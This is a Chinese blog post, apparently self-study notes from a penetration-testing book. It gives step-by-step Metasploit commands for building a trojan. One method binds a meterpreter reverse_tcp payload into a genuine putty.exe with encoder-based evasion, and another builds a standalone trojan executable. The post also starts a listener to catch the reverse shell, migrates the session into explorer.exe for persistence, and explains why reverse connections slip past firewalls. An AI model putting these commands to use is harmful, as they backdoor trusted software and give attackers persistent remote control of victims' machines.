metasploit制作木马程序

  第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤:

  1)百度搜索,下载原版putty程序

  2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5。这样就生成了一个名为putty_backdoor.exe的木马程序。

  3)启动监听程序:msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 E

  4)将木马程序复制到靶机上运行,这时攻击机上就是获得一个远程连接的meterpreter会话。

  5)将木马线程迁移到进程explorer.exe上,命令为run migrate -n explorer.exe(或者是migrate <对应pid>)。

  6)这样,即使用户关闭了这个木马程序,也不会断开后门的连接。


  以下是我从网上搜索得到的步骤:

1)msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=80 X > Desktop/muma01.exe

(这个是将攻击代码包装成程序,上面2)的是将木马附在正常的程序上)

2)msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.128

msf exploit(handler) > set LPORT 80

msf exploit(handler) > exploit 

(进入metasploit启动监听,上面3)的更为简便是因为节省了启动metasploit的时间)

  另外还有选择bind_tcp作为攻击载荷的,步骤大致一样。


PS:reverse_tcp和bind_tcp这两者的执行过程可以大致理解为以下内容(转自csdn用户u014749470):

[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim

after the payload is executed
attacker <-> [port 4444] <-> victim

[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim

after execution
attacker <-> [port 4444] <-> victim


reverse_tcp:攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。
bind_tcp:攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。

采用reverse的方法一般较为安全,因为是在测试机连接攻击机,所以一般不会被防火墙发现;而bind在测试机打开端口时很容易被安全软件和防火墙发现。


你可能感兴趣的:(metasploit自学)